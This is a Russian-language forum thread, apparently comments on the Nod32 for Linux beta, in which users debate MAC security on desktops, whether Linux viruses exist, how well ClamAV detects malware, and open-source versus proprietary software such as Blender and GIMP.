$И это лишь первый пришедший в голову пример. Уверен, что человек, съевший собаку на взломе чужих машин и задавшийся целью написать такой вот зловред, её достигнет. Возможно, у него на это уйдёт на это, скажем, в пять раз больше времени, чем в винде — пусть. Цели он своей достигнет, а дальше проблемы будут ваши.
>>MAC в большинстве случаев не ставит стену против взломщика, а лишь сужает
>>пролом. Если на сервере ещё как-то можно обычно поставить толковые ограничения,
>>то на десктопе найти универсальные политики по определению нереально.
>
>В корпоративной среде вполне реально,При условии достаточной квалификации _постоянных_ админов, и наличии у них времени и желания этим заниматься.
> а для дома сойдут и какие-то обще-типовые варианты + сgroups.
Не сойдут. «Дома» все по жизни плюют на безопасность, взгляните в лицо реальности. Только гики, и то не все, знают и действительно себя берегут. Остальные — кто по незнанию, а кто и целенаправлено («мне бояться нечего, а вот игрушки не работают») отключают все защитные механизмы, как только они им начинают мешать. По опыту, те, кто всё же не отключает, компенсирует это сообразительностью вроде отсылки SMS на сайтах, обещающих тонны халявы.
>+, как я уже сказала, имхо, готовые правла для кучи приложений будут
>рулить.
>Зачем вот, например, mc возможность соединяться с портом 25 на удаленных машинах?mc, может, и незачем. Но кто мешает запустить - абсолютно легально! - тот же dcop командой вроде той, что я приводил несколькими постами ранее? И посыпется спам с авторизованного ящика — прямо-таки счастье для спамера.
>Поэтому зачем нужно будет создателям ботнетов пытаться с этим справиться? Можно будет
>как и раньше мучать винду, на которую и патчи выходят после
>появления эсплойта в паблике, и куча людей метасплойтом умеет пользоваться (труд
>таких кодеров более дешев), и нет ничего подобного MAC: ломаем любой
>сервис под SYSTEM, и получаем SYSTEM привелегии :)Ну, положим, если бы всё было так легко, вендекапец бы наступил давным-давно. :) А нужно, повторюсь, будет ломать то, что популярно. Это просто: ботнетам нужны компы, много компов. Вот и будут их собирать с самых распространённых платформ. Уж на что я люблю OpenBSD, но готов поспорить, что окажись он внезапно самой популярной ОСью на свете, и за его пользователей тоже примутся.
>>MS пробовали сделать роль Power Users — и что вышло?
>
>У MS проблема кучи legacy софта, написанного криво, и требующего, для работы,
>административных привелегий.Эм, я вам про Фому, вы мне про Ерёму…
>[оверквотинг удален]
>вкус пользователя будет занимать у HelpDesk службы как и сейчас гораздо
>больше времени.
>После того, как всех немного поколбасит, будут и готовые сценарии для того
>же Puppet, и искоробочные решения вроде Sandbox (если что, я его
>еще не смотрела, но радует существование таких начинаний)
>
>>Например, я слабо представляю себе, как сделать MAC-политики для kdeinit, под
>>которым выполняется куча сервисов, а-ля services.exe в винде.
>
>В KDE, с интеграцией WebKit/khtml наступают, увы, на грабли Microsoft.Наступают, не наступают, суть та же: MAC здесь бессилен.
>>А ещё домашние юзеры будут банально отключать MAC.
>
>Сперва, на первой волне, да. Но это не неповоротливый Microsoft, и не
>смотря на то, что Windows фанатики все еще будут вопить про
>вирусы в Linux, так вдруг окажется, что этим можно будет удобно
>пользоваться.Ага. Если объяснить пользователям, как он работает. Только если сейчас с его настройкой зачастую не справляются специалисты, то что говорить про простых юзеров? Понимаете, что в итоге получится? Пару раз юзер тыркнется, обязательно напорется на собственный косяк, и тут добрая душа посоветует: «А отключи нафиг». Таким образом постоянно отключают фаерволы, антивирусы и прочее — всё, что мешает работать. Если же сделать такие средства защиты неотключаемыми, никто просто не будет пользоваться этой системой, а будет пользоваться другой, где они не включены и поэтому удобнее.
>+ еще будут удобные технологии вроде повсеместного выполнения таких приложений, как браузеры
>в контейнерах.Угу, и дырки будут искать не только в браузерах, но ещё и в контейнерах.
>>К слову, вы и сами сказали, что MAC не пользуетесь,
>
>На десктопе не пользуюсь, так как сейчас нет смысла. Зачем обвешивать хижину
>на необитаемом острове амбарными замками, противопожарными системами безопасности, и пр?Чтобы уметь ими пользоваться, когда понадобится, например. :)
>>и надеетесь,
>>что не придётся.
>
>Не совсем так: не хочу, что бы кто-то пытался проломить MAC на
>тех наших серверах, где он используется, а вдруг у него получиться?
>
>Но вот его наличие греет душу.То есть вы говорите, что вам греет душу наличие механизма, на который не можете положиться?!
>>Но вот его наличие греет душу.
>
>То есть вы говорите, что вам греет душу наличие механизма, на который
>не можете положиться?!Зачем Вы передергиваете? Греет душу наличие механизма, на который с _высокой_(но не запредельной) вероятностью можно положиться.
Что касается Ваших примеров, вот не занималась я огранизацией защиты своей станции, но уверена, что для современного d-bus вполне есть (или можно придумать) решения на MAC.
Разбираться в них сейчас нет времени. Думаю, нас рассудит(сорри за тавтологию) время.А что касается юзеров, они часто просто не умеют отключать дефольты, особенно блондинки, пользующиеся нетбуками.
dcop же уже давно мертв, и примеры из него уже давно не актуальны. Извините, разбираться с ним (что бы поспорить с Вами на одном уровне) не хочется (пустая трата времени на изучение мертвой технологии)
>
>>>Но вот его наличие греет душу.
>>
>>То есть вы говорите, что вам греет душу наличие механизма, на который
>>не можете положиться?!
>
>Зачем Вы передергиваете? Греет душу наличие механизма, на который с _высокой_(но не
>запредельной) вероятностью можно положиться.Бр-р-р. Может, я дурак, но не понимаю, как можно на что-то положиться с вероятностью. Либо доверие есть, либо нет. Доверие на 99% — это не доверие. Неважно, сколько брешей закрывает ваша защита — важно, сколько их остаётся. А уж когда найдут оставшиеся и ими воспользуются — завтра или послезавтра — уже не столь принципиально. Если, конечно, не работать по принципу «заказчик принял, и ладно».
>Что касается Ваших примеров, вот не занималась я огранизацией защиты своей станции,
>но уверена, что для современного d-bus вполне есть (или можно придумать)
>решения на MAC.
>Разбираться в них сейчас нет времени. Думаю, нас рассудит(сорри за тавтологию) время.Согласен, будущее покажет.
>А что касается юзеров, они часто просто не умеют отключать дефольты, особенно
>блондинки, пользующиеся нетбуками.Ага, до тех пор, пока они им не начинают мешать раскладывать вон-тот-виденный-у-Алексеевны-пасьянс. Тут у них и сообразительность включается (как минимум найти знакомого «спеца», который сделает им приятно); правда, хватает этой сообразительности ровно на то, чтобы добиться желаемого.
>dcop же уже давно мертв, и примеры из него уже давно не
>актуальны. Извините, разбираться с ним (что бы поспорить с Вами
>на одном уровне) не хочется (пустая трата времени на изучение мертвой
>технологии)DCOP мёртв как протокол. Утилита dcop по-прежнему в строю и никуда не девается, просто работает теперь через D-Bus.
Да и пример это был лишь первый пришедший в голову. Уверен, что люди, хорошо знающие нутро X.org и современных DE найдут ещё тысячу и один способ. Особенно если у них будет стимул посильнее болтовни на форуме. :)
>
>>И постоянно опаздывать, ошибаться и не справляться. Как вы, например, средствами MAC
>>запретите браузеру перезаписывать файлы, подконтрольные юзеру, без ущерба для его, пользователя,
>>работы?
>
>Браузер может сохранять картинки и заказчки только в одну директорию. Эта директория(ее
>поддиректории) могут быть для пользователя перемонтированы mount --bind на поддиректории картинок,
>документов, и т д.
>
>Пользователи привыкнут :)GoboLinux ? чтож его так мало ? пока за задницу злобный троян не укусил и не вспоминают
>GoboLinux ? чтож его так мало ? пока за задницу злобный троян
>не укусил и не вспоминаютИмхо, Глупости. Виндовая организация директорий никак не коррелирует с безопасностью: у запущенной не под root, а под пользователем программой нет никаких прав на запись в /lib, /etc, и т д, только в хомяк.
В Windows же мы часто не только наблюдаем library hell, который сам по себе вызван этой структурой организации директорий (сюда же кучу минусов про приучение пользователей к срачу в файловой структуре, или отсуствии в Windows аналогов пакетных менеджеров: WSUS/msi имеют очень ограниченную применимость именно из-за файловой структуры), но и инфицирование различного ПО, и именно из-за того, что ПО располагается не там, где с точки зрения безопасности было продумано создателями дистрибутива, а там, где удобнее (быдло)кодеруВот именно с возможностью гадить в хомяк и нужно бороться, возможно, изменением структуры хомяка.
Что касается более-менее строгой организации директорий GoboLinux, и "рецептов", аналогов портов, я не понимаю только одного: _зачем_ это нужно(с точки зрения безопасности, да и вообще смысла), если с безопасностью root-аккаунта в любом *nix и так все хорошо, а *nix с MAC или контейнерами еще лучше?
Прикольно конечно читать базу документированных вендоров вирусов :))
НО... что-то там не видно (на дрвебовском-то сервисе!) ни одного вируса с "поставщиком" (вендором) - дрвеб, и нет ни у одного кагбэ вируса описания (у всех "Описание находится в разработке"). Наверное потому, что в природе не встречаются? Вы например можете поведать, что это за вирус такой - Exploit.Linux.DCom.b например? :) Или Linux/Exploit-Mmap - вобще феерически.
Nod32 и под виндой-то ловит вирусы через одного... а уж байки про линуксовые вирусы мы не первый год слышим, но так и не видим.
>Прикольно конечно читать базу документированных вендоров вирусов :))
>НО... что-то там не видно (на дрвебовском-то сервисе!) ни одного вируса с
>"поставщиком" (вендором) - дрвеб,Вы не разобрались в таблице, видимо. В ней указаны названия вирусов, которые знает Dr.Web, у других антивирусных вендоров. Это не значит, что все данные вирусы были обнаружены этими вендорами, таковая информация в данном списке отсутствует.
> и нет ни у одного кагбэ вируса
>описания (у всех "Описание находится в разработке").Если хотите, начните их писать. Для вирусов под другие платформы описание тоже далеко не всегда указывается.
> Наверное потому, что в
>природе не встречаются? Вы например можете поведать, что это за вирус
>такой - Exploit.Linux.DCom.b например? :) Или Linux/Exploit-Mmap - вобще феерически.А что, вы все вирусы под винду можно поимённо назвать?
>Nod32 и под виндой-то ловит вирусы через одного... а уж байки про
>линуксовые вирусы мы не первый год слышим, но так и не
>видим.Гугль вам в помощь.
Вы слишком много подразумеваете. :)*Все* AV для Линукс сделаны с единственной целью и ловят только Windows вирусы (не считая 0.1% дряни - Java (mobile phones)/JPG (invalid -> buffer overflow)/BMP (invalid -> buffer overflow)/PDF(Adobe Reader vulnerabilities)).
Текст новости:>Компания Eset выпустила вторую бета версию антивируса Nod32 для Linux
Как бы вы написали тогда?"Компания Eset выпустила вторую бета версию антивируса Nod32, работающего на Linux?" Тоже можно подумать, что он лечит Linux вирусы :)
Функция редактирования новости доступна для всех - правьте!
Компания Eset выпустила вторую бета версию антивируса Nod32 для Linux, предназначенного для поиска вирусов, которые могут работать только на Windows-машинах.
>Компания Eset выпустила вторую бета версию антивируса Nod32 для Linux, предназначенного для
>поиска вирусов, которые могут работать только на Windows-машинах.Вы, конечно, по большому счёту правы, но почему вы так уверены, что нативно Линуксовых вирусов нет и быть не может? Это как бы расходится с логикой.. да и вообще как раз теперь, с распространением Линукса (в т.ч. в гос. органах стран и на самом трендовом - разного рода мобилках) назревают благотворные для линуксового вирусописания времена, не считаете?
>>Компания Eset выпустила вторую бета версию антивируса Nod32 для Linux, предназначенного для
>>поиска вирусов, которые могут работать только на Windows-машинах.
>
>Вы, конечно, по большому счёту правы, но почему вы так уверены, что
>нативно Линуксовых вирусов нет и быть не может? Это как бы
>расходится с логикой..Это прежде всего расходится с фактами.
Да причем здесь факты, просто любой юниксоид скажет, что нельзя сидеть под рутом, в винде же каждый второй - администратор с правами, конечно ограничеными, но достаточными, чтобы повредить систему
А убунту грохнуть как два байта об асфальт. sudo открыто
>А убунту грохнуть как два байта об асфальт. sudo открытоДружище, сдается мне - она у тебя сама рухнет.
>Вы слишком много подразумеваете. :)
>
>*Все* AV для Линукс сделаны с единственной целью и ловят только Windows вирусы (не считая 0.1% дряни - Java (mobile phones)/JPG (invalid -> buffer overflow)/BMP (invalid -> buffer overflow)/PDF(Adobe Reader vulnerabilities)).Ложь.
я разбирал на составляющие этот пакет, там база и для виндовой вирусни.
а почему 35?
не 40 и не 30, а 35?зы:
кажется я понимаю почему вся страна в ж... еще не начальник, а уже увольнять. ни разу не встречал ситуацию, когда только клам и ловит, но цифру знает точно.
у меня было несколько раз, когда на файловый сервер с клиентов с дриуб, кав, нав прилетали файлы с вирусами, которые ловил только клам.
и защита должна быть и на сервере, и на клиенте. и желательно разные. поэтому на сервере клама более чем достаточно. на клиенте - по выбору.
>clamav ловит < 35% in the wild вирусов, если вы админ, я бы вас уже уволил.Про 35% Вы загнули (или пруфлинк исследования, гарантированно не проплаченный антивирусной конторой, пожалуйста, в студию, или уволить нужно Вас!),
Дело в том, что и коммерческие не ловят 100% :)
Имхо, два разных антивируса позволят выловить больше, чем один.Мы вот используем, для не очень богатых клиентов, связку clamav + антивирус от Microsoft, в логах havp отнюдь не совсем чисто, и, в общем-то, случаи заражения достаточно редки, хотя и бывают (в основном, с флэшек или еще какими-нибудь дурацкими способами)
Хотя, конечно, используем HAVP в стандартном прокси как раз для того, что бы некоторым предложить купить к нему DrWeb.
Для почты это чудо не годится, а на десктопе ловить им нечего. Придумали бы они, что ли, сначала для чего оно надо, прежде чем выпускать, а то ведь не купит никто.
>Для почты это чудо не годится, а на десктопе ловить им нечего.
>Придумали бы они, что ли, сначала для чего оно надо, прежде
>чем выпускать, а то ведь не купит никто.А вот насчёт не купит, однако, верно подмечено :) не тот контенгент Ж)
>>Для почты это чудо не годится, а на десктопе ловить им нечего.
>>Придумали бы они, что ли, сначала для чего оно надо, прежде
>>чем выпускать, а то ведь не купит никто.
>
>А вот насчёт не купит, однако, верно подмечено :) не тот контенгент
>Ж)В России уже дают _реальные_ сроки за использование пиратского ПО в корпоративных окружениях, поэтому антивирусы для Samba и почтовых серверов под Unix вполне себе покупаются.
Программа отлично подходит для LiveCD для восстановления/лечения убитых Windows партиций, так что не понимаю почему все так кипятятся.Кстати, для Linux локальная IDS/network control а-ля Kaspersky Internet Security очень бы не помешал - так было бы легко отслеживать локальные приложения, которые стали себя некорректно вести (читай - ломиться в сеть без надобности), но ведь все будут орать что оно не нужно, даже учитывая, что в open source ПО можно запихать backdoors (читай сегодняшнюю новость про Unreal IRC сервер) и в open source ПО бывают (о-да) дыры, например, за последние лет 5 в Linux ядре нашли три local root privilege escalation уязвимости.
Как всё же жаль смотреть на фанатиков - заходишь на Linux форум - все кидают какашками в Windows/закрытое ПО, заходишь на Windows форум - все говорят, что Linux последний sucks, пользователи MacOS вообще полные неадекваты, хотя я попробовал Mac OS X и проблевался (уж простите за жаргон).
Жаль, что нет AI, чтобы всех фанатеющих банить перманентно до просветления мозгов, ибо проприетарное ПО нужно и аналогов для некоторых его видов никогда не будет (можно вспомнить те же игры ради примера, CAD/Visualize/Medicine системы и пр и пр) - не будь Sun, в Open Source не было бы ни одного ... Office Suite :) Забавно.
>Как всё же жаль смотреть на фанатиков - заходишь на Linux форум - все кидают какашками в Windows/закрытое ПО, заходишь на Windows форум - все говорят, что Linux последний sucks, пользователи MacOS вообще полные неадекваты, хотя я попробовал Mac OS X и проблевался (уж простите за жаргон).Один только birdie адекватный д'Артаньян и еще Касперский весь в белом.
>заходишь на Windows форум - все говорят, что Linux последний sucks
Не правда, я регулярно на вантузных форумах бываю, там все только и говорят о том как лечить|восстанавливать|активировать|дезактивировать венду, холиварят за антивирусы, обсуждают как обходить грабли и где качать варез. Им не до Линукса вообще. =)
>
>Один только birdie адекватный д'Артаньян и еще Касперский весь в белом.:) Я спокойный, а в Kasperksy просто лучшая на сегодняшний день IDS. Если знаете что-то лучше - с удовольствием готов выслушать.
>Не правда, я регулярно на вантузных форумах бываю, там все только и
>говорят о том как лечить|восстанавливать|активировать|дезактивировать венду, холиварят за антивирусы, обсуждают как
>обходить грабли и где качать варез. Им не до Линукса вообще.
>=)Так говорят новички, у профессионалов обычно всё работает годами без вирусов, троянов, падений и пр. У моей одной знакомой Windows XP работала таким макаром с 2002 по 2009 год (пока не сдох комп). XP выдержала SP0->SP1->SP2->SP3 :)
профессионалы?!! :D
группа риска без резинки - вот это кто.знаешь почему я ставлю клам не только на проверку хттп-трафика/почты/... для виндовых клиентов, но и на самбу (которая только внутри)?
чтобы не оказаться таким прАсифи-Аналом.
На старой работе из-за такого прАсифи-анала у нас инет отрубили.
Его машина спамила вовсю, но на все упреки он отвечал, да чо, не может быть, я же прАсифи-анал
>в Kasperksy просто лучшая на сегодняшний день IDSА скидка есть, если я два возьму?
>Так говорят новички, у профессионалов обычно всё работает годами без вирусов, троянов, падений и пр.Потому что профессионалы выбирают Kaspersky Internet Security!!!111
>>Как всё же жаль смотреть на фанатиков - заходишь на Linux форум - все кидают какашками в Windows/закрытое ПО, заходишь на Windows форум - все говорят, что Linux последний sucks, пользователи MacOS вообще полные неадекваты, хотя я попробовал Mac OS X и проблевался (уж простите за жаргон).
>
>Один только birdie адекватный д'Артаньян и еще Касперский весь в белом.
>
>>заходишь на Windows форум - все говорят, что Linux последний sucks
>
>Не правда, я регулярно на вантузных форумах бываю, там все только и
>говорят о том как лечить|восстанавливать|активировать|дезактивировать венду, холиварят за антивирусы, обсуждают как
>обходить грабли и где качать варез. Им не до Линукса вообще.
>=)Ради бога, я не говорю, что вы не правы, но зайдите на RuTracker.ru (бывший торрентс.ру) и введите в поиске live cd dvd или boot. Может быть удивитесь, но теперь почти все сборки-образы собираются используя ISOLINUX (который очень хвалят за кач. и шустроту) и часто имеют хоть какую-то минимальную "лайв", но всё таки, сборку Линукса (которую тоже хвалят за шуструю загрузку, минимальный размер (при возможностях как минимум музыку во время восстановления послушать и pdf\djvu почитать) и возможность благодаря NTFS3G драйверу заходить и спокойно работать даже на подбитых NTFS разделах, а также GParted). Также куча комментов, объясняющих и теоретизирующих, как запускать образы с ХДД или посадить live windows рядом с live linux на одном DVD или даже флешке, используя GRUB и GRUB4DOS. Так что в последнее время Линукс даже у заядлых вендузятников начинается ассоциироваться, пусть и с временным, но спасителем, а также с чем то лёгким и работающим.
Эберхард:Не бойся врагов - в худшем случае они могут тебя убить. Не бойся друзей - в худшем случае они могут тебя предать. Бойся равнодушных - они не убивают и не предают, но только с их молчаливого согласия существует на земле предательство и убийство.
>Эберхард:
>
>Не бойся врагов - в худшем случае они могут тебя убить. Не
>бойся друзей - в худшем случае они могут тебя предать. Бойся
>равнодушных - они не убивают и не предают, но только с
>их молчаливого согласия существует на земле предательство и убийство.Ахах, т.е. если тебя предадут и убьют тебе ещё не будет всё равно??? И вообще, к чему ЭТО (не пришей кобыле хвост)
> Жаль, что нет AI, чтобы всех фанатеющих банить перманентно до просветления мозгов, ибо проприетарное ПО нужно и аналогов для некоторых его видов никогда не будет (можно вспомнить те же игры ради примера, CAD/Visualize/Medicine системы и пр и пр) - не будь Sun, в Open Source не было бы ни одного ... Office Suite :) Забавно.GNOME Office/KOffice
Blender
Gimp
и еще много-много всегоА про то, что не будь линукса не было бы инета, где ты пишешь свой бред вообще молчу.
>> Жаль, что нет AI, чтобы всех фанатеющих банить перманентно до просветления мозгов, ибо проприетарное ПО нужно и аналогов для некоторых его видов никогда не будет (можно вспомнить те же игры ради примера, CAD/Visualize/Medicine системы и пр и пр) - не будь Sun, в Open Source не было бы ни одного ... Office Suite :) Забавно.
>
>GNOME Office/KOffice
>Blender
>Gimp
>и еще много-много всегоЭто только офисные программы. Полностью closed source никуда не исчезнет, ибо в узких нишах открытие исходников абсолютно неприемлемо — код заюзают, а за сопровождение никто не будет платить, так как не всегда можно пускать стороннюю контору (особенно из другой страны) к своим данным, даже косвенно.
>А про то, что не будь линукса не было бы инета, где
>ты пишешь свой бред вообще молчу.Ну, положим, не Linux, а *nix . ;)
>Ну, положим, не Linux, а *nix . ;)А ещё точнее - IOS, которая вообще вещь сама в себе. :)
>>Ну, положим, не Linux, а *nix . ;)
>
>А ещё точнее - IOS, которая вообще вещь сама в себе. :)Кстати, да, и её, безусловно, тоже.
Поинтересуйтесь на досуге на чём работают Google и Akamai
Какой нафиг уботгий IOS...
>Поинтересуйтесь на досуге на чём работают Google и Akamai
>Какой нафиг уботгий IOS...Поинтересуйтесь на досуге, когда появился IOS, а когда — Google и Akamai.
> Поинтересуйтесь на досуге, когда появился IOS, а когда — Google и Akamai.Вы ещё gopher вспомните...
А пока факт остаётся фактом - не будь линукса не было бы инета, в современном виде
И убогонький IOS тут не при чём, даже сама cisco делает роутеры на linux-е
>> Поинтересуйтесь на досуге, когда появился IOS, а когда — Google и Akamai.
>
>Вы ещё gopher вспомните...
>А пока факт остаётся фактом - не будь линукса не было бы
>инета, в современном видеНе будь винды, инета — в современном виде — тоже не было бы.
>И убогонький IOS тут не при чём,
Три ха-ха
> даже сама cisco делает роутеры на linux-е
И что?
>А пока факт остаётся фактом - не будь линукса не было бы инетаскорее без Apache не развился бы так линукс на котором сейчас
стоит множество инстансов Apacha'а.
>[оверквотинг удален]
>>GNOME Office/KOffice
>>Blender
>>Gimp
>>и еще много-много всего
>
>Это только офисные программы. Полностью closed source никуда не исчезнет, ибо в
>узких нишах открытие исходников абсолютно неприемлемо — код заюзают, а за
>сопровождение никто не будет платить, так как не всегда можно пускать
>стороннюю контору (особенно из другой страны) к своим данным, даже косвенно.
>А вы взгляните на это - http://www.linuxmint.com/blog/?p=1434 . Неплохо, да? И самое главное, получает не "контора" и не какие-то "шибко шустрые", а сами разрабы. И столько, насколько их поддержат и оценят люди, а не они сами или их главы, манагеры и маркетологи. (Принцип "ты мне, я тебе" - взаимоподдержка, в то же время - вот те и мотивация для дальнейшей работы, и даже прожить так можно)
И вы правы в том, что навряд ли мы доживём до того момента, когда программ и решений с закрытым кодом не станет (и они не будут востребованны в специфических областях), но будь вы повнимательнее, то заметили бы, что мир (по крайней мере в образованных и высших кругах) постепенно переходит на открытые стандарты и свободный софт (все понимают, что капитализм - это один конец разветвлённой палки, другие концы которой - коммунизм, фашизм, анархия, диктатура, и что "золотая" - именно середина), на открытое П.О. всё больше обращают взор компании и корпорации, задушившие друг друга своими же ограничениями прав и имеющие из-за того проблемы и убытки, и так же постепенно появляются всё новые свободные альтернативы самому разному П.О., новые варианты свободных лицензий, падает спрос и нужда в закрытых проприетарных приложениях, закрытых лицензиях и т.д.>
>>А про то, что не будь линукса не было бы инета, где
>>ты пишешь свой бред вообще молчу.
>
>Ну, положим, не Linux, а *nix . ;)А это - вообще демагогия.
>[оверквотинг удален]
>>>Gimp
>>>и еще много-много всего
>>
>>Это только офисные программы. Полностью closed source никуда не исчезнет, ибо в
>>узких нишах открытие исходников абсолютно неприемлемо — код заюзают, а за
>>сопровождение никто не будет платить, так как не всегда можно пускать
>>стороннюю контору (особенно из другой страны) к своим данным, даже косвенно.
>>
>
>А вы взгляните на это - http://www.linuxmint.com/blog/?p=1434 . Неплохо, да?Неплохо. Только из того, что такая добровольная поддержка имеет место быть вовсе не следует, что она заменит всё остальное. :) То есть к чему вы это показали — непонятно.
>>>А про то, что не будь линукса не было бы инета, где
>>>ты пишешь свой бред вообще молчу.
>>
>>Ну, положим, не Linux, а *nix . ;)
>
>А это - вообще демагогия.Это стремление к точности (переходящее в занудство), которое досталось мне от родителей. :-P
> GNOME Office/KOfficeЭто шутка такая или вы просто названия знаете? Вы в них что-то серьёзное делали?
> Blender
Вы это пытаетесь сравнить с LightWave 3d/Maya/3ds Max? Я не перестаю смеяться. Сколько _фильмов_ сделано с участием Blender? А я вам подскажу - ноль.
> Gimp
Вы пробовали в нём _работать_, а не играться? Когда этот продукт научится хотя бы "эффекты для слоёв", без которых большинство дизайнеров просто не работают?
Г-н mine, умейте отличать Open Source программки, сделанные на коленке в свободное время и closed source программные комплексы.
И учтите, я не поливаю open source, и знаю какие в нём вещи заслуживают внимания (Apache/kernel/KDE/Gnome/etc).
> Сколько _фильмов_ сделано с участием Blender? А я вам подскажу - ноль.Вы просто пустозвон и как обычно газифицировали лужу:
"Первым крупным профессиональным проектом, в ходе которого был использован Blender, является Человек-паук 2. Blender использовался для создания аниматики (animatics) и пре-визуализации всей истории для storyboard department."Это из Вики. Blender достаточно широко используется профессионалами.
> Вы пробовали в нём _работать_, а не играться?
Опять и этот продукт используется профессионалами.
> Г-н mine, умейте отличать Open Source программки, сделанные на коленке в свободное время и closed source программные комплексы.
Inkscape прекрасно вытесняет closed source программные комплексы. У него огромное комьюнити на _винде_. Ога, несмотря на GTK.
Добавлю - «Человек-паук 2» является обладателем «Оскара» в номинации «Лучшие визуальные эффекты» 2005 года"
Уели, не посмотрел, но поглядите, ради интереса, список фильмов, сделанных с участием трёх вышеперечисленных программ.Там счёт идёт на сотни. :)
Как и с Blender-ом. На одного высокобюджетного ($2E8) "Человека-паука" придется не один десяток поделок попроще.
я извиняюсь, но киноиндустрию вы зря затронули.
это практически единственная отрасль, где линух чуть меньше чем полностью. особенно после смерти силиконграфикс.
любой уважающий себя проект делаетсвои разработки, эффекты и тд.
полюбопытсвуйте в гугле на тему hollywood+linux
а ширпотреб, вами перечисленный - ну... у нас... в где нибудь в дом2... ну а что вы от переферии экшена хотите?
нам надо с легким паром делать. этого больше никто не может.
Да, действительно. кинопромышленность плотно подсела на foss, что правда, то правда.в вакансиях требование к разработчикам и/или админам - linux постоянно.
Раньше, лет десять, как было - 2 художника за sgi WS и десяток негров за nt - детали доделывают на пс послабей. и затем все это на linux кластере. Сейчас то же самое :) только везде Linux, blender и куча своего софта.
>> GNOME Office/KOffice
>
>Это шутка такая или вы просто названия знаете? Вы в них что-то
>серьёзное делали?А вы? Некоторые созданные в виндовозе документы там форматируются правильней чем в OOo, и все замечательно работает
>А я вам подскажу - ноль.
Попробуйте еще раз. Почитайте что использует ILM, сильно удивитесь.
>> Gimp
>Вы пробовали в нём _работать_, а не играться? Когда этот продукт научится
>хотя бы "эффекты для слоёв", без которых большинство дизайнеров просто не
>работают?Требование из разряда "хочу ОС как windows". А вы пробовали работать, а не играться? Если бы пробовали, знали бы что инструменты, позволяющие добивать аналогичных фотошопу результатов там называются по другому. Но вы ни GIMP'ом, ни фотошопом не пользовались. Максимум - быдлоткрытку и inner bevel и shadow, ага, вот эффекты для слоев и запомнились.
>И учтите, я не поливаю open source, и знаю какие в нём
>вещи заслуживают внимания (Apache/kernel/KDE/Gnome/etc).Видим, как вы знаете.
>> GNOME Office/KOffice
>
>Это шутка такая или вы просто названия знаете? Вы в них что-то
>серьёзное делали?В них можно многое серьёзное сделать. Не всё, но 95%+ того, что потребуется обычным пользователям и студентам. И полностью за бесплатно, без нужды платить (за то, что изредка откроешь\распечатаешь какой-то документ) или крякать, набирая вирусы в Windows (\Wine - ведь MSы не выпускают свои оффисы для Линукса и МакОСя, не?)
>
>> Blender
>
>Вы это пытаетесь сравнить с LightWave 3d/Maya/3ds Max? Я не перестаю смеяться.
>Сколько _фильмов_ сделано с участием Blender? А я вам подскажу -
>ноль.Какую историю имели они и какого масштаба фирмы их создавали и развивали (учитывая, что блендер - с 2002 г. свободное П.О.)? Кто вообще знал до последних времён такие программы как блендер, если всё эфирное время и интернет был и остаётся завален рекламой от именитых контор под именитыми брендами? Сколько стоят (учитывая, к примеру бюджет начинающего студента) LightWave 3d ($895.00-$995.00)/Maya (101832.58 руб.-171864.19 руб. - вообще жесть!!!)/3ds Max (57148 - 141497 руб. - та ну на***)??? А вы вот это тоже учли при сравнении: "the Blender installer of 2.49 build for Windows 32 bits is 10.5 MB, requiring 36 MB after installation, and a lite build takes 2.2 MB; whereas software like AutoCAD requires around 2 GB"??? Вы вообще, хоть одним глазом взглянули на него, прежде чем делать такие заявления? Почему тогда уж ни слова о XSi, который ничуть нехуже, а намного дешевле (500-600 бакинских)? А вы поди не знали, слабее "бренд" раскручен?
>
>> Gimp
>
>Вы пробовали в нём _работать_, а не играться? Когда этот продукт научится
>хотя бы "эффекты для слоёв", без которых большинство дизайнеров просто не
>работают?
>Ух ты. И что ж это тогда было, когда я накладывал на изображение полупрозрачные слои со своими приколами и эффектами? Никак название другое и реализовано немного не по-абобовски? И вообще US$699 - US$999 ради того, чтоб изредка побаловаться с фотками\порисовать... for what?
>Г-н mine, умейте отличать Open Source программки, сделанные на коленке в свободное
>время и closed source программные комплексы.
>Вы неправильно смотрите на вещи. Если а) поддерживать и поощрять (в т.ч. денежно) разработку свободного ПО, писать статьи и знакомить с ним окружающих - так оно явно лучше распространится и быстрее будет развиваться, если б) обсирать, сравнивая "по проигрышам" с именитыми брендами - вы создаёте дурную славу свободному ПО и косвенно укрепляете имидж и мнение о "незаменимости" тех самых дорогих программных комплексов, заранее отпугивая тех же молодых дизайнеров и просто юзеров хотя бы попробовать, а возможно и присоединиться к сообществу, даже написать какой хороший плагин, помочь в поисках ошибок...
К тому же смотрите на всё только глазами успешных профессионалов (которых - абс. меньшинство и зарабатывают этим неплохо), совершенно игнорируя как минимум:1) обычных пользователей, которым по большому счёту НЕ НУЖНЫ огромные программные комплексы с грандиозными перечнями в меню, в которых они просто запутаются;
2) талантливых школьников, студентов и просто энтузиастов, сидящих на Линуксах, живущих в странах "третьего мира", многомиллионые армии бедных со всего света, которые тоже хотят\нуждаются и как бы имеют право что-то творить, но не имеют возможности (тупо финансы), не хотят (принципы) или вынуждены буквально выпрашивать\брать в кредит\уезжать работать "на запад" ..или.. "крякать"... А может вы поддерживаете отставание "других" стран, социальное неравенство, бедноту, попрошайничество, Банки, отсутствие свободы мышления, "эмиграцию умов", воровство и пиратство???
К тому же именно в опен-сорс сообщество вместе выискивает каждую проблемку и решает, что им самим в первую очередь нужно - проблемы лишь в количестве "глаз и рук" и отсутствии времени, а вот компании в первую очередь заботятся о рекламе и известности своих брендов (реклама - маркетинг, реклама - маркетинг...), во-вторую - об имидже (подкупы, вырезания с сайтов\блогов плохих новостей\отзывов, нанятие "евангеликов", пропагандирующих и учащих почему "лучше" и как юзать), и только в-третью качество (переименование уже существующих фич, добавление пунктов меню, перехват чужих технологий, латание самых ужасных дыр и багов...). А многое из того, что сделано хорошего и повлияло на выбор и популяризацию тогда, в 80-90-ых, тогда и сделано было. Теперь - в осн. загрузка блотом и ожирение, чтоб не возникало сомнения ещё и компы по-новее, да по-мощнее купить и ОС обновить.
>И учтите, я не поливаю open source, и знаю какие в нём
>вещи заслуживают внимания (Apache/kernel/KDE/Gnome/etc).Мало знаете. Незачёт.
>> Gimp
>
>Вы пробовали в нём _работать_, а не играться? Когда этот продукт научится
>хотя бы "эффекты для слоёв", без которых большинство дизайнеров просто не
>работают?Я не профи, но пользователь Gimp, часто редактирую в нем фотки. Как пользоваться фотошопом уже немного подзабыла, для моих нужд хватает с головой.
Что именно не так
http://www.progimp.ru/articles/from_a_summer_at_winter/
В Gimp?
А со слоями?
http://www.progimp.ru/articles/correction_of_color_balance/
И операциями с ними?
